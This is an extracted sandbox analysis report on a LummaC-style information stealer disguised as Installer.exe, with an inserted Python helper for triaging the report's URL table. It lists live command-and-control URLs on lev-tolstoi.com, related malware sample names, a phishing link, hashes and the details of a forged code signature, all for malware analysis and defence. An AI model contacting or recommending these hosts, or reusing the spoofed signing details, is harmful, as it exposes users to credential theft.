                                                                                                                                                            https://checkout.steampowered.com/Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesInstaller.exe, 00000003.00000003.1763272472.0000000005C72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://crl.entrust.net/2048ca.crl0Installer.exefalse
                                                                                                                                                                  high
                                                                                                                                                                  https://store.steampowered.com/;Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://www.entrust.net/rpa0Installer.exefalse
                                                                                                                                                                      high
                                                                                                                                                                      https://store.steampowered.com/about/Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://steamcommunity.com/my/wishlist/Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://ocsp.entrust.net03Installer.exefalse
                                                                                                                                                                              high
                                                                                                                                                                              http://ocsp.entrust.net02Installer.exefalse
                                                                                                                                                                                high
                                                                                                                                                                                https://help.steampowered.com/en/Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://steamcommunity.com/market/Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://store.steampowered.com/news/Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://lev-tolstoi.com/pi.WInstaller.exe, 00000003.00000003.1835591588.0000000003559000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835776038.000000000356C000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835675481.000000000355D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Installer.exe, 00000003.00000003.1762901890.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1762839863.0000000005C8B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://lev-tolstoi.com/$5Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://lev-tolstoi.com/apimInstaller.exe, 00000003.00000002.3522783205.000000000355F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                        unknown
                                                                                                                                                                                        http://store.steampowered.com/subscriber_agreement/Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgInstaller.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installer.exe, 00000003.00000003.1763175969.0000000005CE3000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1763272472.0000000005C97000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1785769288.0000000005C97000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://recaptcha.net/recaptcha/;Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://steamcommunity.com/discussions/Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://store.steampowered.com/stats/Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amInstaller.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://medal.tvInstaller.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://broadcast.st.dl.eccdnx.comInstaller.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngInstaller.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&aInstaller.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://store.steampowered.com/steam_refunds/Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                http://x1.c.lencr.org/0Installer.exe, 00000003.00000003.1808852557.0000000005C82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  http://x1.i.lencr.org/0Installer.exe, 00000003.00000003.1808852557.0000000005C82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallInstaller.exe, 00000003.00000003.1763272472.0000000005C72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchInstaller.exe, 00000003.00000003.1762901890.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1762839863.0000000005C8B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&aInstaller.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              high
Legend for the IP column:
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
104.21.66.86 | lev-tolstoi.com | United States | - | 13335 | CLOUDFLARENETUS | false
23.55.153.106 | steamcommunity.com | United States | - | 20940 | AKAMAI-ASN1EU | false
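Most rows in the URL table above are benign strings (Steam, Mozilla, Office, CA/OCSP endpoints) scraped from browser and application data the stealer read, and the sandbox's own Malicious column is "false" for every one of them, including the lev-tolstoi.com rows that the Avira URL Cloud lookup flags as malware with an unknown reputation. The script below is an added triage helper, not part of the Joe Sandbox report: it parses the table in the run-together form this extraction presents (URL, Source and Malicious flag fused on one line, then optional "•" antivirus bullets and a reputation line), keeps only rows with an AV hit or a non-high reputation, and reduces them to hostnames that can be cross-checked against the IP table. It assumes every Source cell begins with the sample name ("Installer.exe"), which is how the URL boundary is found; the sample rows embedded in it are copied from this page.

```python
"""Triage the 'URLs from memory and binary data' rows of an extracted
Joe Sandbox report (added example; not Joe Sandbox code).

Row format as seen on this page, one record per URL:
    <url><sample-name>, <dump-id>[, <sample-name>, <dump-id> ...]<true|false>
    [• <antivirus detection>]...
    <reputation word>
"""
import re
from dataclasses import dataclass, field
from typing import List, Set
from urllib.parse import urlsplit

# Assumption: every Source cell starts with the submitted sample's name, so the
# URL is everything up to its first occurrence (lazy match), and the line ends
# with the Malicious flag.
SAMPLE_NAME = "Installer.exe"
ROW_RE = re.compile(
    r"^(?P<url>https?://.*?)"
    r"(?P<source>" + re.escape(SAMPLE_NAME) + r".*?)"
    r"(?P<malicious>true|false)$"
)
# Each source entry is "<sample-name>, <dump-id>"; split only before a sample name.
SOURCE_SPLIT_RE = re.compile(r",\s*(?=" + re.escape(SAMPLE_NAME) + r")")


@dataclass
class UrlRow:
    url: str
    sources: List[str]
    malicious: bool                      # the sandbox verdict column
    av_detections: List[str] = field(default_factory=list)
    reputation: str = ""                 # e.g. "high" or "unknown"

    @property
    def host(self) -> str:
        return urlsplit(self.url).hostname or ""


def parse_url_table(text: str) -> List[UrlRow]:
    """Parse extracted table lines; leading indentation is ignored."""
    rows: List[UrlRow] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = ROW_RE.match(line)
        if m:
            rows.append(UrlRow(
                url=m.group("url"),
                sources=SOURCE_SPLIT_RE.split(m.group("source")),
                malicious=(m.group("malicious") == "true"),
            ))
        elif rows and line.startswith("•"):
            rows[-1].av_detections.append(line.lstrip("• ").strip())
        elif rows and re.fullmatch(r"[a-z]+", line):
            rows[-1].reputation = line
    return rows


def triage(rows: List[UrlRow]) -> List[UrlRow]:
    """Rows worth a second look: any AV hit, or a reputation other than 'high'.
    The Malicious column alone is not enough: on this report the C2 rows are
    'false' there and only the AV cloud lookup flags them."""
    return [r for r in rows if r.av_detections or r.reputation != "high"]


def flagged_hosts(rows: List[UrlRow]) -> Set[str]:
    """Hostnames to cross-reference with the report's IP/domain table."""
    return {r.host for r in triage(rows)}


# Constructed input: five rows copied from this report's URL table.
SAMPLE_TABLE = """
https://www.youtube.com/Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpfalse
high
https://lev-tolstoi.com/apix:ZInstaller.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpfalse
• Avira URL Cloud: malware
unknown
http://crl.entrust.net/2048ca.crl0Installer.exefalse
high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallInstaller.exe, 00000003.00000003.1763272472.0000000005C72000.00000004.00000800.00020000.00000000.sdmpfalse
high
https://lev-tolstoi.com/espFInstaller.exe, 00000003.00000002.3522659058.0000000003512000.00000004.00000020.00020000.00000000.sdmpfalse
• Avira URL Cloud: malware
unknown
"""

if __name__ == "__main__":
    parsed = parse_url_table(SAMPLE_TABLE)
    for row in triage(parsed):
        print(f"{row.host:20} {row.url:40} av={row.av_detections} rep={row.reputation}")
    print("hosts to pivot on:", sorted(flagged_hosts(parsed)))
```

The lazy URL match is what keeps a URL such as "...2cb5ac1d8e17Install" intact: "InstallInstaller.exe" only matches the sample name at its second "Install", so the trailing fragment stays with the URL exactly as the report shows it.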
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1581507
Start date and time: 2024-12-27 23:12:30 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 7s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
                                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                                              Sample name:Installer.exe
                                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@6/1@11/2
                                                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                                                              • Successful, ratio: 66.7%
                                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                                              • Successful, ratio: 98%
                                                                                                                                                                                                                              • Number of executed functions: 59
                                                                                                                                                                                                                              • Number of non-executed functions: 170
                                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                                                                                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                                                                                                                                              • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.63
                                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                              • Execution Graph export aborted for target Installer.exe, PID 7480 because there are no executed function
                                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                              • VT rate limit hit for: Installer.exe
                                                                                                                                                                                                                              No simulations
Match (IP) | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
104.21.66.86 | MV ROCKET_PDA.exe | Get hash | malicious | FormBook | Browse | www.ayushigangwar.com/nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=59bmqUDXor7TXV4b71NCQ0d0nCVif23i1yH5+9ZmJc5hgCU7y+ZN9z0btTsWzGv6OrGw
23.55.153.106 | Setup.exe | Get hash | malicious | Unknown | Browse |
23.55.153.106 | w22319us3M.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRAT | Browse |
23.55.153.106 | T4qO1i2Jav.exe | Get hash | malicious | LummaC Stealer | Browse |
23.55.153.106 | FXdg37pY22.exe | Get hash | malicious | LummaC Stealer | Browse |
23.55.153.106 | FXdg37pY22.exe | Get hash | malicious | LummaC Stealer | Browse |
23.55.153.106 | k0ukcEH.exe | Get hash | malicious | LummaC | Browse |
23.55.153.106 | 5uVReRlvME.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, Stealc | Browse |
23.55.153.106 | 8WRONDszv4.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRAT | Browse |
23.55.153.106 | z3IxCpcpg4.exe | Get hash | malicious | LummaC | Browse |
23.55.153.106 | GtEVo1eO2p.exe | Get hash | malicious | LummaC | Browse |
Match (domain) | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
lev-tolstoi.com | SoftWare(1).exe | Get hash | malicious | LummaC | Browse | 104.21.66.86
lev-tolstoi.com | ForcesLangi.exe | Get hash | malicious | LummaC | Browse | 104.21.66.86
lev-tolstoi.com | Leside-.exe | Get hash | malicious | LummaC | Browse | 104.21.66.86
lev-tolstoi.com | Vq50tK1Nx2.exe | Get hash | malicious | LummaC | Browse | 104.21.66.86
lev-tolstoi.com | IzDjbVdHha.exe | Get hash | malicious | LummaC | Browse | 172.67.157.254
lev-tolstoi.com | T4qO1i2Jav.exe | Get hash | malicious | LummaC Stealer | Browse | 172.67.157.254
lev-tolstoi.com | FXdg37pY22.exe | Get hash | malicious | LummaC Stealer | Browse | 104.21.66.86
lev-tolstoi.com | k0ukcEH.exe | Get hash | malicious | LummaC | Browse | 172.67.157.254
lev-tolstoi.com | pVbAZEFIpI.exe | Get hash | malicious | LummaC | Browse | 172.67.157.254
lev-tolstoi.com | GxX48twWHA.exe | Get hash | malicious | LummaC | Browse | 104.21.66.86
steamcommunity.com | SoftWare(1).exe | Get hash | malicious | LummaC | Browse | 104.102.49.254
steamcommunity.com | ForcesLangi.exe | Get hash | malicious | LummaC | Browse | 92.122.104.90
steamcommunity.com | Leside-.exe | Get hash | malicious | LummaC | Browse | 92.122.104.90
steamcommunity.com | Setup.exe | Get hash | malicious | Unknown | Browse | 104.121.10.34
steamcommunity.com | Setup.exe | Get hash | malicious | Unknown | Browse | 23.55.153.106
steamcommunity.com | Vq50tK1Nx2.exe | Get hash | malicious | LummaC | Browse | 104.121.10.34
steamcommunity.com | IzDjbVdHha.exe | Get hash | malicious | LummaC | Browse | 104.121.10.34
steamcommunity.com | T4qO1i2Jav.exe | Get hash | malicious | LummaC Stealer | Browse | 23.55.153.106
steamcommunity.com | FXdg37pY22.exe | Get hash | malicious | LummaC Stealer | Browse | 23.55.153.106
Match (ASN) | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
AKAMAI-ASN1EU | Setup.exe | Get hash | malicious | Unknown | Browse | 23.55.153.106
AKAMAI-ASN1EU | w22319us3M.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRAT | Browse | 23.55.153.106
AKAMAI-ASN1EU | T4qO1i2Jav.exe | Get hash | malicious | LummaC Stealer | Browse | 23.55.153.106
AKAMAI-ASN1EU | FXdg37pY22.exe | Get hash | malicious | LummaC Stealer | Browse | 23.55.153.106
AKAMAI-ASN1EU | FXdg37pY22.exe | Get hash | malicious | LummaC Stealer | Browse | 23.55.153.106
AKAMAI-ASN1EU | grand-theft-auto-5-theme-1-installer_qb8W-j1.exe | Get hash | malicious | Unknown | Browse | 184.85.182.130
AKAMAI-ASN1EU | k0ukcEH.exe | Get hash | malicious | LummaC | Browse | 23.55.153.106
AKAMAI-ASN1EU | 5uVReRlvME.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, Stealc | Browse | 23.55.153.106
AKAMAI-ASN1EU | 8WRONDszv4.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRAT | Browse | 23.55.153.106
AKAMAI-ASN1EU | aD7D9fkpII.exe | Get hash | malicious | Vidar | Browse | 23.209.72.25
CLOUDFLARENETUS | phish_alert_iocp_v1.4.48 - 2024-12-27T140703.193.eml | Get hash | malicious | Unknown | Browse | 104.18.11.207
CLOUDFLARENETUS | SoftWare(1).exe | Get hash | malicious | LummaC | Browse | 104.21.66.86
CLOUDFLARENETUS | SharcHack.exe | Get hash | malicious | Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer | Browse | 104.21.73.97
CLOUDFLARENETUS | NewSetup.exe | Get hash | malicious | LummaC | Browse | 172.67.157.249
CLOUDFLARENETUS | ForcesLangi.exe | Get hash | malicious | LummaC | Browse | 104.21.66.86
CLOUDFLARENETUS | iviewers.dll | Get hash | malicious | LummaC | Browse | 104.21.60.24
CLOUDFLARENETUS | http://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=h | Get hash | malicious | HTMLPhisher | Browse | 104.17.25.14
                                                                                                                                                                                                                                                  launcher.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.21.58.80
                                                                                                                                                                                                                                                  Leside-.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                  solara-executor.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 172.67.75.163
                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                  a0e9f5d64349fb13191bc781f81f42e1SoftWare(1).exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  NewSetup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  ForcesLangi.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  iviewers.dllGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  launcher.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  Leside-.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  search.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                  • 23.55.153.106
No context

Process: C:\Users\user\Desktop\Installer.exe
File Type: assembler source, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 14402
Entropy (8bit): 4.874636730022465
Encrypted: false
SSDEEP: 384:vlICCmV5fTMzsM3qlICCmV5fTMzsM3ip9guFx2rBhiLfmfU:vGCC+dMOGCC+dMY9guFx2rBo
MD5: DF0EFD0545733561C6E165770FB3661C
SHA1: 0F3AD477176CF235C6C59EE2EB15D81DCB6178A8
SHA-256: A434B406E97A2C892FA88C3975D8181EBEA62A8DA919C5221409E425DF50FD17
SHA-512: 3FF527435BC8BCF2640E0B64725CC0DB8A801D912698D4D94C44200529268B80AA7B59A2E2A2EA6C4621E09AA249AAA3583A8D90E4F5D7B68E0E6FFFEB759918
Malicious: false
Reputation: low
Preview: AcquireSRWLockExclusive..AcquireSRWLockShared..ActivateActCtx..ActivateActCtxWorker..AddAtomA..AddAtomW..AddConsoleAliasA..AddConsoleAliasW..AddDllDirectory..AddIntegrityLabelToBoundaryDescriptor..AddLocalAlternateComputerNameA..AddLocalAlternateComputerNameW..AddRefActCtx..AddRefActCtxWorker..AddResourceAttributeAce..AddSIDToBoundaryDescriptor..AddScopedPolicyIDAce..AddSecureMemoryCacheCallback..AddVectoredContinueHandler..AddVectoredExceptionHandler..AdjustCalendarDate..AllocConsole..AllocateUserPhysicalPages..AllocateUserPhysicalPagesNuma..AppPolicyGetClrCompat..AppPolicyGetCreateFileAccess..AppPolicyGetLifecycleManagement..AppPolicyGetMediaFoundationCodecLoading..AppPolicyGetProcessTerminationMethod..AppPolicyGetShowDeveloperDiagnostic..AppPolicyGetThreadInitializationType..AppPolicyGetWindowingModel..AppXGetOSMaxVersionTested..ApplicationRecoveryFinished..ApplicationRecoveryInProgress..AreFileApisANSI..AssignProcessToJobObject..AttachConsole..BackupRead..BackupSeek..BackupWrite..B
File type: PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit): 7.576095801286095
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: Installer.exe
File size: 577,064 bytes
MD5: 0cebf27d0066d6ea5653547254e236e4
SHA1: badfc5a68c17d2d1112e50ccd8ececeb4f8ba8a9
SHA256: 21d9bba7ae0dfb0892e5345ee42d73e241e0d9841a17ff340f6278e86d8f54f4
SHA512: 5590c096ba88b0e4b5dcb246930853a619216bc8135e799c92c194525299bc8fb6b941dec480d1b293eee6f5e7adc2d663ae483d86c8708d3f9be04fa4180a46
SSDEEP: 12288:+YO6Dqzihouxpa+yWz2qRPmZqaKS6gfb3e82ffYDXCOEO:nO6DThou2+y02TZqa97b3effIXXt
TLSH: 77C4E1123680C0B3D963153759B9C7794A3EF8201F616AC793984BBEDEB06D15F30A6E
File Content Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....ng..........................................@..................................|....@.................................|j..<..
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x4104a0
Entrypoint Section: .text
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows cui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp: 0x676E98E6 [Fri Dec 27 12:09:10 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 96d90e8808da099bc17e050394f447e7
Signature Valid: false
Signature Issuer: CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error: The digital signature of the object did not verify
Error Number: -2146869232
Not Before: 12/01/2023 19:00:00
Not After: 16/01/2026 18:59:59
Subject Chain:
• CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
Version: 3
Thumbprint MD5: 5F1B6B6C408DB2B4D60BAA489E9A0E5A
Thumbprint SHA-1: 15F760D82C79D22446CC7D4806540BF632B1E104
Thumbprint SHA-256: 28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
Serial: 0997C56CAA59055394D9A9CDB8BEEB56
Instruction
call 00007EFDFCAE445Ah
jmp 00007EFDFCAE42BDh
mov ecx, dword ptr [0043B680h]
push esi
push edi
mov edi, BB40E64Eh
mov esi, FFFF0000h
